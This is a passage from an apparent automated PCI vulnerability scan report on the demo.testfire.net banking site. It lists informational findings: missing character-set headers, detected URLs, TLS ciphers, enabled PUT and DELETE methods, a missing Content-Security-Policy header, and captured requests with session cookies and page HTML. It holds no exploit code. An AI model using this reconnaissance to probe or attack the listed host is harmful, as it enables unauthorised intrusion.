these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on whats
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat

Reference:
http://code.google.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 684 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
com/p/browsersec/wiki/Part2#Character_set_handling_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings

Evidence:
URL: https://demo.testfire.net/high_yield_investments.htm

Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.

338 HTTP Responses Missing 0.0 Info Pass URL: https://demo.testfire.net/retirement.htm


Character Encoding Port: tcp/443

During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on whats
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 685 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat

Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings

Evidence:
URL: https://demo.testfire.net/retirement.htm

Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.

339 Host Detected 0.0 Info Pass This host responded to network probes.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N

Evidence:
cpe: cpe:/h:linksys:befw11s4
ip_address: 65.61.137.117
os_name: embedded

340 Website Location Detected 0.0 Info Pass URL: https://65.61.137.117:8443/index.jsp?content=inside_contact.


htm
Port: tcp/8443

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 686 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

341 Website Location Detected 0.0 Info Pass URL: https://65.61.137.117:8443/disclaimer.htm?url=http://www.net


scape.com
Port: tcp/8443

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

342 Website Location Detected 0.0 Info Pass URL: https://demo.testfire.net/index.jsp?content=business.htm


Port: tcp/443

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

343 Website Location Detected 0.0 Info Pass URL: https://demo.testfire.net/subscribe.jsp


Port: tcp/443

A website location was detected.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 687 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

344 Website Location Detected 0.0 Info Pass URL: https://demo.testfire.net/login.jsp


Port: tcp/443

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

345 Embedded links or code 0.0 Info Pass URL: https://demo.testfire.net/index.jsp?content=inside_contact.ht


from out-of-scope domains m
Port: tcp/443

Externally served scripts or objects can present a security risk because


they are not subject to system and application controls. Including
scripts from untrusted domains can result into any one of following 1-
Loss of control over changes to the application. 2- Execution of
arbitrary code on client systems. 3- Disclosure or leakage of sensitive
information to 3rd parties.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

Evidence:
DetectionDetails: Following External Links Found:
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/fl
ash/swflash.cab#version=6,0,0,0" width="

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 688 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
125" height="50" id="subscribe" align="middle"> <param
name="allowScriptAccess" value="sameDomain"> <param
name="movie" value="subscribe.swf"> <param name="quality"
value="high"> <param name="bgcolor" value="#ffffff"> <embed
src="subscribe.swf" width="125" height="50" text="subscribe"
align="middle" type="application/x-shockwave-flash"> </object>
Request: GET
https://demo.testfire.net/index.jsp?content=inside_contact.htm
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=0565231311CE173563DB02789CEE78E3

Remediation:
If external scripts are necessary to provide a particular service then get
the scripts from the third party, perform a review for functionality and
integrity and post it on a web server.

346 Enumerated SSL/TLS Cipher 0.0 Info Pass Port: tcp/443


Suites
The finding reports the SSL cipher suites for each SSL/TLS service
version provided by the remote service. This finding does not represent
a vulnerability, but is only meant to provide visibility into the behavior
and configuration of the remote SSL/TLS service.
The information provided as part of this finding includes the SSL
version (ex: TLSv1) as well as the name of the cipher suite (ex: RC4-
SHA).

A cipher suite is a set of cryptographic algorithms that provide


authentication, encryption, and message authentication code (MAC) as

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 689 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
part of an SSL/TLS negotiation and through the lifetime of the SSL
session. It is typical that an SSL service would support multiple cipher
suites. A cipher suite can be supported by across multiple SSL/TLS
versions, so you should be of no concern to see the same cipher name
reported for multiple

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat, apache:tomcat

Reference:
http://www.openssl.org/docs/apps/ciphers.html

Evidence:
Cipher Suite: TLSv1 : ECDHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : DHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : ECDHE-RSA-AES128-SHA
Cipher Suite: TLSv1 : DHE-RSA-AES128-SHA
Cipher Suite: TLSv1_1 : ECDHE-RSA-AES256-SHA
Cipher Suite: TLSv1_1 : DHE-RSA-AES256-SHA
Cipher Suite: TLSv1_1 : ECDHE-RSA-AES128-SHA
Cipher Suite: TLSv1_1 : DHE-RSA-AES128-SHA
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES256-GCM-SHA384
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES256-SHA384
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES256-SHA
Cipher Suite: TLSv1_2 : DHE-RSA-AES256-GCM-SHA384
Cipher Suite: TLSv1_2 : DHE-RSA-AES256-SHA256
Cipher Suite: TLSv1_2 : DHE-RSA-AES256-SHA
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES128-GCM-SHA256
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES128-SHA256

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 690 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES128-SHA
Cipher Suite: TLSv1_2 : DHE-RSA-AES128-GCM-SHA256
Cipher Suite: TLSv1_2 : DHE-RSA-AES128-SHA256
Cipher Suite: TLSv1_2 : DHE-RSA-AES128-SHA

Remediation:
No remediation is necessary.

347 SSL-TLS Certificate 0.0 Info Pass Port: tcp/443


Information
Information extracted from a certificate discovered on a TLS or SSL
wrapped service.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat, apache:tomcat

Evidence:
Verified: true
Today: 2019-08-05 21:59:44 -0500
Start date: 2018-12-21 02:38:15 UTC
End date: 2019-12-21 03:08:14 UTC
Expired: false
Fingerprint: B0:46:07:6F:F1:C9:1D:08:80:C8:64:5F:53:D8:C9:BE
Subject: /C=CA/ST=Ontario/L=Ottawa/O=IBM/CN=altoromutual.com
Common name: altoromutual.com
Issuer: /C=US/O=Entrust, Inc./OU=See www.entrust.net/legal-
terms/OU=(c) 2012 Entrust, Inc. - for authorized use only/CN=Entrust
Certification Authority - L1K

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 691 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Signature Algorithm: sha256WithRSAEncryption
Version: 2

348 Service Detected 0.0 Info Pass Port: tcp/443

This service responded to network probes.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat, apache:tomcat

Evidence:
application_cpe: cpe:/a:apache:tomcat, cpe:/a:apache:tomcat
application_name: apache:tomcat, apache:tomcat
application_protocol: https
ip_address: 65.61.137.117
port_number: 443
ssl_enabled: true
transport_protocol: tcp

349 HTTP Responses Missing 0.0 Info Pass URL: https://65.61.137.117/swagger/index.html


Character Encoding Port: tcp/443

During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 692 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on whats
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat

Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings

Evidence:
URL: https://65.61.137.117/swagger/index.html

Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.

350 Discovered HTTP Methods 0.0 Info Pass URL: http://demo.testfire.net/my%20documents/


Port: tcp/80

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 693 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Requesting the allowed HTTP OPTIONS from this host shows which
HTTP protocol methods are supported by its web server. Note that, in
some cases, this information is not reported by the web server
accurately.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat

Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
URL: http://demo.testfire.net/my%20documents/

Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.

351 HTTP Responses Missing 0.0 Info Pass URL: http://demo.testfire.net:8080/swagger/index.html


Character Encoding Port: tcp/8080

During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on whats
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 694 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat

Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings

Evidence:
URL: http://demo.testfire.net:8080/swagger/index.html

Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.

352 Website Detected 0.0 Info Pass URL: http://demo.testfire.net:8080/


Port: tcp/8080

This website was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 695 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Application: apache:tomcat

Evidence:
application_name: apache:tomcat
path: /
potential_custom_web_app: true

353 Website Location Detected 0.0 Info Pass URL: https://65.61.137.117/index.jsp?content=inside_contact.htm


Port: tcp/443

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

354 Website Location Detected 0.0 Info Pass URL: http://65.61.137.117/login.jsp


Port: tcp/80

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

355 Website Location Detected 0.0 Info Pass URL: http://65.61.137.117/search.jsp?query=_WSETESTDATA


Port: tcp/80

A website location was detected.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 696 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

356 Website Location Detected 0.0 Info Pass URL: http://65.61.137.117:8080/search.jsp?query=_WSETESTDATA


Port: tcp/8080

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

357 Website Location Detected 0.0 Info Pass URL: http://65.61.137.117:8080/disclaimer.htm?url=http://www.nets


cape.com
Port: tcp/8080

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

358 Website Location Detected 0.0 Info Pass URL: http://65.61.137.117:8080/disclaimer.htm?url=http://www.micr


osoft.com
Port: tcp/8080

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 697 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

359 Website Location Detected 0.0 Info Pass URL: http://65.61.137.117:8080/index.jsp?content=personal.htm


Port: tcp/8080

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

360 Website Location Detected 0.0 Info Pass URL: http://65.61.137.117:8080/doSubscribe


Port: tcp/8080

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

361 Insecure or no Content- 0.0 Info Pass URL: http://65.61.137.117:8080/


Security-Policy header Port: tcp/8080

Content-Security-Policy (CSP) is a W3C specification offering the


possibility to instruct the client browser from which location and/or
which type of resources are allowed to be loaded. This header can be
useful to prevent Cross-Site Scripting issues present on the site, if used
correctly.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 698 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Reference:
https://www.owasp.org/index.php/Content_Security_Policy

Evidence:
DetectionDetails: No Content-Security-Policy present for entire
application
Request: GET http://65.61.137.117:8080/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Response: HTTP/1.1 200 OK


Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=76AA5AC0228D700D9219ED73F9533B78;
Path=/; HttpOnly
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:34:24 GMT
Content-Length: 9369

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 699 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<!-- BEGIN HEADER -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">

<div id="header" style="margin-bottom:5px; width: 99%;">


<form id="frmSearch" method="get" action="/search.jsp">
<table width="100%" border="0" cellpadding="0"
cellspacing="0">
<tr>
<td rowspan="2"><a id="HyperLink1" href="
/index.jsp"><img src="/images/logo.gif" width=283
height=80/></a></td>
<td align="right" valign="top">
<a id="LoginLink" href="/login.jsp"><font
style="font-weight: bold; color: red;">Sign In</font></a> | <a id="
HyperLink3" href="/index.jsp?content=inside_contact.htm">Contact
Us</a> | <a id="HyperLink4" href="/feedback.jsp">Feedback</a> |
<label for="txtSearch">Search</label>
<input type="text" name="query" id="query" accesskey="S" />
<input type="submit" value="Go" />
</td>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 700 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
</tr>
<tr>
<td align="right" style="background-image:
url('/images/gradient.jpg');padding:0px;margin:0px;"><img src="
/images/header_pic.jpg" alt="" width=354 height=60/></td>
</tr>
</table>
</form>
</div>

<table cellspacing="0" width="100%">


<tr>
<td width="25%" class="bt br bb"><div id="Header1"><img id="
Image1" src="/images/pf_lock.gif" width=12 height=14 style="vertical-
align: bottom;" alt="Secure Login"/> &nbsp; <a id="AccountLink"
href="/login.jsp" class="focus" >ONLINE BANKING
LOGIN</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header2"><a id="
LinkHeader2" class="focus" href="/index.jsp?content=personal.htm"
>PERSONAL</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header3"><a id="
LinkHeader3" class="focus" href="/index.jsp?content=business.htm"
>SMALL BUSINESS</a></div></td>
<td width="25%" class="cc bt bb"><div id="Header4"><a id="
LinkHeader4" class="focus" href="/index.jsp?content=inside.htm"
>INSIDE ALTORO MUTUAL</a></div></td>
</tr>
<tr>

<!-- END HEADER -->

<div id="wrapper" style="width: 99%;">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 701 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

<!-- TOC BEGIN -->


<td valign="top" class="cc br bb">
<br style="line-height: 10px;"/>

<a id="CatLink1" class="subheader" href="index.jsp?


content=personal.htm">PERSONAL</a>
<ul class="sidebar">
<li><a id="MenuHyperLink1" href="index.jsp?
content=personal_deposit.htm">Deposit Product</a></li>
<li><a id="MenuHyperLink2" href="index.jsp?
content=personal_checking.htm">Checking</a></li>
<li><a id="MenuHyperLink3" href="index.jsp?
content=personal_loans.htm">Loan Products</a></li>
<li><a id="MenuHyperLink4" href="index.jsp?
content=personal_cards.htm">Cards</a></li>
<li><a id="MenuHyperLink5" href="index.jsp?
content=personal_investments.htm">Investments &amp;
Insurance</a></li>
<li><a id="MenuHyperLink6" href="index.jsp?
content=personal_other.htm">Other Services</a></li>
</ul>

<a id="CatLink2" class="subheader" href="index.jsp?


content=business.htm">SMALL BUSINESS</a>
<ul class="sidebar">
<li><a id="MenuHyperLink7" href="index.jsp?
content=business_deposit.htm">Deposit Products</a></li>
<li><a id="MenuHyperLink8" href="index.jsp?
content=business_lending.htm">Lending Services</a></li>
<li><a id="MenuHyperLink9" href="index.jsp?
content=business_cards.htm">Cards</a></li>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 702 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<li><a id="MenuHyperLink10" href="index.jsp?
content=business_insurance.htm">Insurance</a></li>
<li><a id="MenuHyperLink11" href="index.jsp?
content=business_retirement.htm">Retirement</a></li>
<li><a id="MenuHyperLink12" href="index.jsp?
content=business_other.htm">Other Services</a></li>
</ul>

<a id="CatLink3" class="subheader" href="index.jsp?


content=inside.htm">INSIDE ALTORO MUTUAL</a>
<ul class="sidebar">
<li><a id="MenuHyperLink13" href="index.jsp?
content=inside_about.htm">About Us</a></li>
<li><a id="MenuHyperLink14" href="index.jsp?
content=inside_contact.htm">Contact Us</a></li>
<li><a id="MenuHyperLink15" href="cgi.exe"
>Locations</a></li>
<li><a id="MenuHyperLink16" href="index.jsp?
content=inside_investor.htm">Investor Relations</a></li>
<li><a id="MenuHyperLink17" href="index.jsp?
content=inside_press.htm">Press Room</a></li>
<li><a id="MenuHyperLink18" href="index.jsp?
content=inside_careers.htm">Careers</a></li>
<li><a id="MenuHyperLink19" href="
subscribe.jsp">Subscribe</a></li>
</ul>
</td>
<!-- TOC END -->

<td valign="top" colspan="3" class="bb">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 703 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<!-- Keywords:Altoro Mutual, online banking,
banking, checking, savings, accounts -->
<br />
<table border=0 cellspacing=0 width="100%">
<tr>
<td width="33%" valign="top">
<b><a href="index.jsp?content=personal_savings.htm">Online
Banking with FREE Online Bill Pay </a></b><br />
No stamps, envelopes, or checks to write give you more time to
spend on the things you enjoy. <br />
<br />
<center><img src="images/home1.jpg" width="170" height="
114" /></center>
<br />

<b><a href="index.jsp?content=personal_loans.htm">Real
Estate Financing</a></b><br />
Fast. Simple. Professional. Whether you are preparing to buy,
build, purchase land, or construct new space, let Altoro Mutual's
premier real estate lenders help with financing. As a regional leader,
we know the market, we understand the business, and we have the
track record to prove it
</td>
<td width="33%" valign="top">
<center><img src="images/home2.jpg" width="170" height="
128" /></center>
<br /><br/>
<b><a href="index.jsp?content=business_cards.htm">Business
Credit Cards</a></b><br />
You're always looking for ways to improve your company's bottom
line. You want to be informed, improve efficiency and control expenses.
Now, you can do it all - with a business credit card account from Altoro
Mutual.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 704 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<br />

<br />
<b><a href="index.jsp?content=business_retirement.htm"
>Retirement Solutions</a></b><br />
Retaining good employees is a tough task. See how Altoro Mutual
can assist you in accomplishing this feat through effective Retirement
Solutions.
</td>
<td width="33%" valign="top">
<b>Privacy and Security </b><br />
The 2000 employees of Altoro Mutual are dedicated to protecting
your <a href="index.jsp?content=privacy.htm">privacy</a> and <a
href="default.jsp?content=security.htm">security</a>. We pledge to
provide you with the information and resources that you need to help
secure your information and keep it confidential. This is our promise.
<br /><br />

<center><img src="images/home3.jpg" width="170" height="


113" /></center><br /><br />

<b><a href="survey_questions.jsp">Win a Samsung Galaxy S10


smartphone</a></b>
<br />
Completing this short survey will enter you in a draw for 1 of 5
Samsung Galaxy S10 smartphones! We look forward to hearing your
important feedback.
<br /><br />
</td>
</tr>
</table>

</td>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 705 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

</div>

<!-- BEGIN FOOTER -->

</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
